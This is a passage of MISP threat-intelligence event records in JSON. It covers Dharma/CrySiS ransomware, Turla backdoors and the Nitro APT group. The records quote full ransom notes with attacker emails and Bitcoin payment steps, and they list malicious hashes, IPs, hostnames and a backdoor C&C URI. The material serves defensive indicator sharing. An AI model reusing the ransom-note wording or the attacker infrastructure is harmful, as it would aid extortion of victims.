and select the seller by payment method and price.\\nhttps://localbitcoins.com/buy_bitcoins\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\nAttention!\\nDo not rename encrypted files.\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\nWrite this ID in the title of your message BCBEF350\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\nhttps://localbitcoins.com/buy_bitcoins \\nAlso you can find other places to buy Bitcoins and beginners guide here: \\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\nAttention!\\nDo not rename encrypted files. \\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","all your data has been locked us\\nYou want to return?\\nwrite email Beamsell@qq.com"],"ransomnotes-filenames":["README.txt","README.jpg","Info.hta","FILES ENCRYPTED.txt","INFO.hta"],"ransomnotes-refs":["https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg","https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg","https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg","https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg","https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg"],"refs":["https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html","https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/","https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/","https://twitter.com/demonslay335/status/1049313390097813504","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/","https://twitter.com/JakubKroustek/status/1038680437508501504","https://twitter.com/demonslay335/status/1059521042383814657","https://twitter.com/demonslay335/status/1059940414147489792","https://twitter.com/JakubKroustek/status/1060825783197933568","https://twitter.com/JakubKroustek/status/1064061275863425025","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/","https://www.youtube.com/watch?v=qjoYtwLx2TI","https://twitter.com/GrujaRS/status/1072139616910757888"]},"source":"Various","tag_id":"23","tag_name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","type":"ransomware","uuid":"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b","value":"Dharma Ransomware","version":"86"}],"description":"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","icon":"btc","id":"43","name":"Ransomware","namespace":"misp","type":"ransomware","uuid":"3f44af2e-1480-4b6b-9aa8-f9bb21341078","version":"4"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[],"ShadowAttribute":[],"Tag":[{"colour":"#0088cc","exportable":true,"hide_tag":false,"id":"23","local":0,"name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#004646","exportable":true,"hide_tag":false,"id":"21","local":0,"name":"type:OSINT","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"},{"colour":"#2c4f00","exportable":true,"hide_tag":false,"id":"24","local":0,"name":"malware_classification:malware-category=\"Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#00223b","exportable":true,"hide_tag":false,"id":"3","local":0,"name":"osint:source-type=\"blog - post\"","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"7","date":"2017-08-25","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"5","info":"OSINT - New Arena Crysis Ransomware Variant Released","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226331","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1503930276","uuid":"59a3d08d-5dc8-4153-bc7c-456d950d210f"}} +{"Event":{"Attribute":{"id":"10794","type":"domain|ip","category":"Network activity","to_ids":false,"uuid":"5bf30242-8ef4-4c52-a2d7-0b7b0a016219","event_id":"14","distribution":"5","timestamp":"1542652482","comment":"1st stage","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"your-ip.getmyip.com|178.128.103.74","Galaxy":[],"ShadowAttribute":[]},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","http://pastebin.com/raw/GHgpWjar","MISP Project"],"collection_uuid":"10cf658b-5d32-4c4b-bb32-61760a640372","description":"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant","galaxy_id":"43","id":"6619","local":false,"meta":{"date":["November 2016"],"encryption":["AES + RSA-512"],"extensions":[".dharma",".wallet",".zzzzz",".cmb",".id-BCBEF350.[paymentbtc@firemail.cc].cmb",".bip",".id-BCBEF350.[Beamsell@qq.com].bip",".boost",".[Darknes@420blaze.it].waifu",".brrr",".adobe",".tron",".AUDIT",".cccmn",".fire",".myjob",".[cyberwars@qq.com].war",".risk",".RISK",".bkpx",".[newsantaclaus@aol.com].santa"],"payment-method":["Bitcoin - Email"],"ransomnotes":["all your data has been locked us\\nYou want to return?\\nwrite email paymentbtc@firemail.cc","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\nWrite this ID in the title of your message ACBFF130\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\nhttps://localbitcoins.com/buy_bitcoins\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\nAttention!\\nDo not rename encrypted files.\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","All your files have been encrypted!\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\nWrite this ID in the title of your message BCBEF350\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\nFree decryption as guarantee\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\nHow to obtain Bitcoins\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\nhttps://localbitcoins.com/buy_bitcoins \\nAlso you can find other places to buy Bitcoins and beginners guide here: \\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\nAttention!\\nDo not rename encrypted files. \\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.","all your data has been locked us\\nYou want to return?\\nwrite email Beamsell@qq.com"],"ransomnotes-filenames":["README.txt","README.jpg","Info.hta","FILES ENCRYPTED.txt","INFO.hta"],"ransomnotes-refs":["https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg","https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg","https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg","https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg","https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg"],"refs":["https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html","https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/","https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/","https://twitter.com/demonslay335/status/1049313390097813504","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/","https://twitter.com/JakubKroustek/status/1038680437508501504","https://twitter.com/demonslay335/status/1059521042383814657","https://twitter.com/demonslay335/status/1059940414147489792","https://twitter.com/JakubKroustek/status/1060825783197933568","https://twitter.com/JakubKroustek/status/1064061275863425025","https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/","https://www.youtube.com/watch?v=qjoYtwLx2TI","https://twitter.com/GrujaRS/status/1072139616910757888"]},"source":"Various","tag_id":"23","tag_name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","type":"ransomware","uuid":"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b","value":"Dharma Ransomware","version":"86"}],"description":"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml","icon":"btc","id":"43","name":"Ransomware","namespace":"misp","type":"ransomware","uuid":"3f44af2e-1480-4b6b-9aa8-f9bb21341078","version":"4"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[],"ShadowAttribute":[],"Tag":[{"colour":"#0088cc","exportable":true,"hide_tag":false,"id":"23","local":0,"name":"misp-galaxy:ransomware=\"Dharma Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#004646","exportable":true,"hide_tag":false,"id":"21","local":0,"name":"type:OSINT","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"},{"colour":"#2c4f00","exportable":true,"hide_tag":false,"id":"24","local":0,"name":"malware_classification:malware-category=\"Ransomware\"","numerical_value":null,"user_id":"0"},{"colour":"#00223b","exportable":true,"hide_tag":false,"id":"3","local":0,"name":"osint:source-type=\"blog - post\"","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"7","date":"2017-08-25","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"5","info":"OSINT - New Arena Crysis Ransomware Variant Released","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226331","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1503930276","uuid":"59a3d08d-5dc8-4153-bc7c-456d950d210f"}} +{"Event":{"Attribute":{"Galaxy":[],"ShadowAttribute":[],"category":"External analysis","comment":"Carbon sample - Xchecked via VT: a08b8371ead1919500a4759c2f46553620d5a9d9","deleted":false,"disable_correlation":false,"distribution":"5","event_id":"4","first_seen":null,"id":"342","last_seen":null,"object_id":"0","object_relation":null,"sharing_group_id":"0","timestamp":"1490878550","to_ids":false,"type":"link","uuid":"58dd0056-6e74-43d5-b58b-494802de0b81","value":"https://www.virustotal.com/file/7fa4482bfbca550ce296d8e791b1091d60d733ea8042167fd0eb853530584452/analysis/1486030116/"},"EventReport":[],"Galaxy":[{"GalaxyCluster":[{"authors":["Alexandre Dulaunoy","Florian Roth","Timo Steffens","Christophe Vandeplas","Dennis Rand","raw-data"],"collection_uuid":"0d821b68-9d82-4c6d-86a6-1071a9e0f79f","description":"Family of related sophisticated backdoor software - Name comes from Microsoft detection signature – anagram of Ultra (Ultra3) was a name of the fake driver). A macOS version exists but appears incomplete and lacking features...for now!","galaxy_id":"36","id":"5828","local":false,"meta":{"refs":["https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf","https://objective-see.com/blog/blog_0x25.html#Snake"],"synonyms":["Snake","Uroburos","Urouros"],"type":["Backdoor","Rootkit"]},"source":"MISP Project","tag_id":"22","tag_name":"misp-galaxy:tool=\"Turla\"","type":"tool","uuid":"22332d52-c0c2-443c-9ffb-f08c0d23722c","value":"Turla","version":"138"}],"description":"Threat actors tools is an enumeration of tools used by adversaries. The list includes malware but also common software regularly used by the adversaries.","icon":"optin-monster","id":"36","name":"Tool","namespace":"misp","type":"tool","uuid":"9b8037f7-bc8f-4de1-a797-37266619bc0b","version":"3"}],"Object":[],"Org":{"id":"1","local":true,"name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"2","local":false,"name":"CIRCL","uuid":"55f6ea5e-2c60-40e5-964f-47a8950d210f"},"RelatedEvent":[{"Event":{"Org":{"id":"1","name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"4","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f"},"analysis":"2","date":"2015-01-20","distribution":"3","id":"369","info":"OSINT Analysis of Project Cobra Another extensible framework used by the Uroburos’ actors from Gdata","org_id":"1","orgc_id":"4","published":true,"threat_level_id":"1","timestamp":"1498163317","uuid":"54bf5a6f-ac50-4f71-9cd3-7080950d210b"}},{"Event":{"Org":{"id":"1","name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"4","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f"},"analysis":"2","date":"2014-11-20","distribution":"3","id":"621","info":"Turla digging using TotalHash","org_id":"1","orgc_id":"4","published":true,"threat_level_id":"2","timestamp":"1498163604","uuid":"546daad5-425c-4ac4-82c7-e07f950d210b"}}],"ShadowAttribute":[],"Tag":[{"colour":"#065100","exportable":true,"hide_tag":false,"id":"22","local":0,"name":"misp-galaxy:tool=\"Turla\"","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"100","date":"2017-03-30","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"4","info":"OSINT - Carbon Paper: Peering into Turla’s second stage backdoor","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226330","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1493403824","uuid":"58dcfe62-ed84-4e5e-b293-4991950d210f"}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1077","type":"sha256","category":"External analysis","to_ids":true,"uuid":"54324042-49fc-4628-a95e-44da950d210b","event_id":"2","distribution":"5","timestamp":"1412579394","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"0a1103bc90725d4665b932f88e81d39eafa5823b0de3ab146e2d4548b7da79a0","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1084","type":"ip-dst","category":"Network activity","to_ids":true,"uuid":"54324081-3308-4f1f-8674-4953950d210b","event_id":"2","distribution":"5","timestamp":"1412579457","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"223.25.233.248","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1086","type":"hostname","category":"Network activity","to_ids":true,"uuid":"543240dc-f068-437a-baa9-48f2950d210b","event_id":"2","distribution":"5","timestamp":"1412579548","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"xenserver.ddns.net","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1089","type":"text","category":"External analysis","to_ids":false,"uuid":"543240f9-64e8-41f2-958f-4e21950d210b","event_id":"2","distribution":"5","timestamp":"1412579577","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"Nitro","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1090","type":"sha1","category":"External analysis","to_ids":true,"uuid":"56c625a7-f31c-460c-9ea1-c652950d210f","event_id":"2","distribution":"5","timestamp":"1455826343","comment":"Automatically added (via 7915aabb2e66ff14841e4ef0fbff7486)","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"0ea76f1586c008932d90c991dfdd5042f3aac8ea","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"12394","type":"domain","category":"Network activity","to_ids":false,"uuid":"572b4ab3-1af0-4d91-9cd5-07a1c0a8ab16","event_id":"22","distribution":"5","timestamp":"1462454963","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"whatsapp.com","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"158","orgc_id":"5","org_id":"1","date":"2018-01-08","threat_level_id":"1","info":"Turla: Mosquito Whitepaper","published":true,"uuid":"5a5395d1-40a0-45fc-b692-334a0a016219","attribute_count":"61","analysis":"0","timestamp":"1535462417","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637953","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f","local":false},"Attribute":{"id":"17299","type":"url","category":"Network activity","to_ids":false,"uuid":"5a53976c-e7c8-480d-a68a-2fc50a016219","event_id":"158","distribution":"5","timestamp":"1515427692","comment":"Fake adobe URL","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"http://get.adobe.com/stats/AbfFcBebD/?q=","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[{"Event":{"id":"58","date":"2018-08-17","threat_level_id":"1","info":"Turla Outlook White Paper","published":true,"uuid":"5b773e07-e694-458b-b99c-27f30a016219","analysis":"0","timestamp":"1535462383","distribution":"3","org_id":"1","orgc_id":"5","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5"},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f"}}}],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"7","name":"misp-galaxy:threat-actor=\"Turla Group\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0},{"id":"70","name":"Turla","colour":"#f20f53","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"158","orgc_id":"5","org_id":"1","date":"2018-01-08","threat_level_id":"1","info":"Turla: Mosquito Whitepaper","published":true,"uuid":"5a5395d1-40a0-45fc-b692-334a0a016219","attribute_count":"61","analysis":"0","timestamp":"1535462417","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637953","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f","local":false},"Attribute":{"id":"17330","type":"uri","category":"Network activity","to_ids":false,"uuid":"5a539ce1-3de0-4e34-8fc4-2fc50a016219","event_id":"158","distribution":"5","timestamp":"1515429089","comment":"Win32 backdoor C&C URI","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"/scripts/m/query.php?id=","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[{"Event":{"id":"58","date":"2018-08-17","threat_level_id":"1","info":"Turla Outlook White Paper","published":true,"uuid":"5b773e07-e694-458b-b99c-27f30a016219","analysis":"0","timestamp":"1535462383","distribution":"3","org_id":"1","orgc_id":"5","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5"},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f"}}}],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"7","name":"misp-galaxy:threat-actor=\"Turla Group\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0},{"id":"70","name":"Turla","colour":"#f20f53","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"158","orgc_id":"5","org_id":"1","date":"2018-01-08","threat_level_id":"1","info":"Turla: Mosquito 